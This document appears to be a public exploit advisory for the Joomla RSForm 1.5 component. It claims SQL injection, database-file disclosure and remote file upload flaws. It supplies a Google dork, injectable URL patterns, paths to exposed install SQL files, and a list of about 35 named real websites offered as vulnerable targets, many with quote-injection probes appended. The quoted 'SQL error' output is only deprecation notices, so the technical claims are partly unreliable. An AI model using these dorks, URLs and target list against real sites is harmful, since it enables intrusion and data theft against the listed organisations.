Joomla RSForm Components 1.5 Multiple Vuln

1. ####################################################################
2.  
3. # Exploit Title : Joomla RSForm Components 1.5 SQL Injection / Database Disclosure / Remote File Upload
4. # Author [ Discovered By ] : KingSkrupellos
5. # Team : Cyberizm Digital Security Army
6. # Date : 03/02/2019
7. # Vendor Homepage : rsjoomla.com
8. # Software Download Link : rsjoomla.com/free-downloads/download.html?path=
9. com_forme%2FComponent%2Fcom_formeJ15.zip
10. # Software Information Link : rsjoomla.com/joomla-extensions/rsform.html
11. # Software Version : 1.5
12. # Tested On : Windows and Linux
13. # Category : WebApps
14. # Exploit Risk : Medium
15. # Google Dorks : inurl:''/index.php?option=com_rsform''
16. # Vulnerability Type : CWE-89 [ Improper Neutralization of
17. Special Elements used in an SQL Command ('SQL Injection') ]
18. CWE-200 [ Information Exposure ]
19. CWE-264 [ Permissions, Privileges, and Access Controls ]
20. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
21. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
22. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
23.  
24. ####################################################################
25.  
26. # Description about Software :
27. ***************************
28. RSForm! allows you to build forms for Joomla!
29.  
30. ####################################################################
31.  
32. # Impact :
33. ***********
34. * Joomla RSForm Components 1.5 for Joomla is prone to an
35.  
36. SQL-injection vulnerability because it fails to sufficiently sanitize
37.  
38. user-supplied data before using it in an SQL query.
39.  
40. Exploiting this issue could allow an attacker to compromise the application,
41.  
42. access or modify data, or exploit latent vulnerabilities in the underlying database.
43.  
44. A remote attacker can send a specially crafted request to the vulnerable application
45.  
46. and execute arbitrary SQL commands in application`s database.
47.  
48. Further exploitation of this vulnerability may result in unauthorized data manipulation.
49.  
50. An attacker can exploit this issue using a browser.
51.  
52. * This Software prone to an information exposure/database disclosure vulnerability.
53.  
54. Successful exploits of this issue may allow an attacker to obtain sensitive
55.  
56. information by downloading the full contents of the application's database.
57.  
58. * Any remote user may download the database files and gain access
59.  
60. to sensitive information including unencrypted authentication credentials
61.  
62. this software has remote file upload vulnerability.
63.  
64. ####################################################################
65.  
66. # SQL Injection Exploit :
67. **********************
68.  
69. /index.php?option=com_rsform&Itemid=[SQL Injection]
70.  
71. /index.php?option=com_rsform&view=rsform&Itemid=[SQL Injection]
72.  
73. /index.php?option=com_rsform&view=rsform&formId=[ID-NUMBER]&Itemid=[SQL Injection]
74.  
75. /index.php?option=com_rsform&formId=[ID-NUMBER]&asset=[SQL Injection]
76.  
77. ####################################################################
78.  
79. # Database Disclosure Exploit :
80. ***************************
81.  
82. /administrator/components/com_rsform/tmp/rsform-install.sql
83.  
84. /administrator/components/com_rsform/tmp/rsform-uninstall.sql
85.  
86. /administrator/components/com_rsform/tmp/sample-install.sql
87.  
88. ####################################################################
89.  
90. # Remote File Upload/Insert File Exploit :
91. ************************************
92.  
93. /index.php?option=com_rsform&formId=8&form[PositionTitle]=Admin
94.  
95. /index.php?option=com_rsform&formId=[THIS-ID-NUMBER-ALWAYS-CHANGES]
96.  
97. /index.php?option=com_rsform&formId=4
98.  
99. /index.php?option=com_rsform&formId=3
100.  
101. /index.php?option=com_rsform&view=rsform&formId=4
102.  
103. /index.php?option=com_rsform&view=rsform&Itemid=6
104.  
105. /index.php?option=com_rsform&view=rsform&Itemid=37
106.  
107. /index.php/en/?option=com_rsform&view=rsform&formId=3
108.  
109. /index.php?option=com_rsform&view=rsform&formId=5
110.  
111. /index.php?option=com_rsform&view=rsform&formId=6&Itemid=236
112.  
113. /index.php?option=com_rsform&view=rsform&formId=30
114.  
115. /index.php?option=com_rsform&view=rsform&formId=1&Itemid=508
116.  
117. /index.php?option=com_rsform&view=rsform&formId=3&Itemid=223&lang=en
118.  
119. /index.php?option=com_rsform&view=rsform&formId=39&Itemid=1084
120.  
121. /index.php?option=com_rsform&view=rsform&formId=1&Itemid=444
122.  
123. /index.php?option=com_rsform&view=rsform&formId=3&Itemid=178
124.  
125. /index.php?option=com_rsform&view=rsform&Itemid=136&lang=en
126.  
127. # Directory File Path :
128. ********************
129.  
130. /index.php?option=com_rsform&formId=[ID-NUMBER]&tmpl=component&file=[YOUR-FILE-HERE.txt]
131.  
132. /index.php?option=com_rsform&view=rsform&formId=[ID-NUMBER]&submissionId=[FIND-SUBMISSION-ID]
133.  
134. or search your file here.
135.  
136. /administrator/components/com_rsform/......
137.  
138. ####################################################################
139.  
140. # Example Vulnerable Sites :
141. *************************
142.  
143. [+] nzp.co.nz/index.php?option=com_rsform&formId=8&form[PositionTitle]=Admin
144.  
145. [+] chevrolet.com.mm/mm/corvette/index.php?option=com_rsform&view=rsform&formId=6&Itemid=236
146.  
147. [+] meteocomillas.com/index.php?option=com_rsform&Itemid=123%27
148.  
149. [+] meteocomillas.com/administrator/components/com_rsform/tmp/rsform-install.sql
150.  
151. [+] abusheikha.com/ds/index.php?option=com_rsform&view=rsform&formId=3&Itemid=135%27
152.  
153. [+] leads.mymediainc.net/index.php?option=com_rsform&formId=3&asset=1%27
154.  
155. [+] crisbox.co.za/index.php?option=com_rsform&view=rsform&formId=3&Itemid=130%27
156.  
157. [+] casanovecentofeltre.it/site/it/prezzi-prenotazioni/silvio-guarnieri
158. /index.php?option=com_rsform&view=rsform&formId=4&Itemid=201%27
159.  
160. [+] iss-fitness.dk/index.php?option=com_rsform&Itemid=81%27
161.  
162. [+] specialist-resources.com/index.php?option=com_rsform&view=rsform&formId=3&Itemid=115%27
163.  
164. [+] aliarargentina.org/index.php?option=com_rsform&Itemid=11%27
165.  
166. [+] inhousedesignco.com/index.php?option=com_rsform&view=rsform&formId=1&Itemid=158%27
167.  
168. [+] lnx.parcodelsangro.it/parcodelsangro/index.php?option=com_rsform&view=rsform&Itemid=784%27
169.  
170. [+] on8um.be/old_sites/gpscup/index.php?option=com_rsform&view=rsform&formId=3&Itemid=130%27
171.  
172. [+] jclscience.com/index.php?option=com_rsform&view=rsform&Itemid=354%27
173.  
174. [+] socialmediasoluciones.com/index.php?option=com_rsform&view=rsform&Itemid=274%27
175.  
176. [+] higienehospitalar.com.br/index.php?option=com_rsform&Itemid=153%27
177.  
178. [+] fourseasoninrome.altervista.org/index.php?option=com_rsform&Itemid=11%27
179.  
180. [+] iccareer.com/index.php?option=com_rsform&view=rsform&Itemid=124%27
181.  
182. [+] etonvsharrow.com/index.php?option=com_rsform&view=rsform&Itemid=41%27
183.  
184. [+] sandbergen.jmfserver.net/index.php?option=com_rsform&Itemid=8%27
185.  
186. [+] premiergraphics.co.uk/index.php?option=com_rsform&view=rsform&Itemid=6
187.  
188. [+] notore.com/index.php?option=com_rsform&formId=4
189.  
190. [+] custom-envelopes.org/index.php?option=com_rsform&view=rsform&Itemid=37
191.  
192. [+] fnacompressors.com/index.php/en/?option=com_rsform&view=rsform&formId=3
193.  
194. [+] dohertyinc.com/index.php?option=com_rsform&view=rsform&formId=34
195.  
196. [+] ftpierrelivestock.com/index.php?option=com_rsform&view=rsform&formId=1&Itemid=508
197.  
198. [+] healingtouchprogram.com/index.php?option=com_rsform&formId=3
199.  
200. [+] uab.edu/facilities/resources/index.php?option=com_rsform&view=rsform&formId=4
201.  
202. [+] oilibya.co.ke/index.php?option=com_rsform&view=rsform&formId=3&Itemid=223&lang=en
203.  
204. [+] bediscovered.net/index.php?option=com_rsform&view=rsform&formId=4
205.  
206. [+] lclibrary.ca/index.php?option=com_rsform&view=rsform&formId=39&Itemid=1084
207.  
208. [+] laleham.com/health/index.php?option=com_rsform&view=rsform&formId=3&Itemid=178
209.  
210. [+] tagoreint.com/eok/V2.0/index.php?option=com_rsform&view=rsform&formId=1&Itemid=444
211.  
212. [+] sme-angola.com/index.php?option=com_rsform&view=rsform&Itemid=136
213.  
214. ####################################################################
215.  
216. # Example SQL Database Error :
217. ****************************
218. Strict Standards: Only variables should be assigned by reference in
219. /home/abusheik/public_html/ds/components/com_rsform/rsform.php on line 11
220.  
221. Deprecated: iconv_set_encoding(): Use of iconv.internal_encoding is
222. deprecated in /home3/ourplanb/public_html/leads/libraries
223. /joomla/string/string.php on line 28
224.  
225. Deprecated: preg_replace(): The /e modifier is deprecated, use
226. preg_replace_callback instead in /home3/ourplanb/public_html
227. /leads/libraries/joomla/filter/input.php on line 652
228.  
229. Strict Standards: Declaration of KCommandChain::enqueue() should be
230. compatible with KObjectQueue::enqueue(KObjectHandlable $object, $priority)
231. in /home/on8um/public_html/old_sites/gpscup/libraries/koowa/command/chain.php on line 23
232.  
233. Strict Standards: Declaration of KHttpUrl::set() should be compatible with
234. KObject::set($property, $value = NULL) in /home/on8um/public_html
235. /old_sites/gpscup/libraries/koowa/http/url.php on line 0
236.  
237. ####################################################################
238.  
239. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
240.  
241. ####################################################################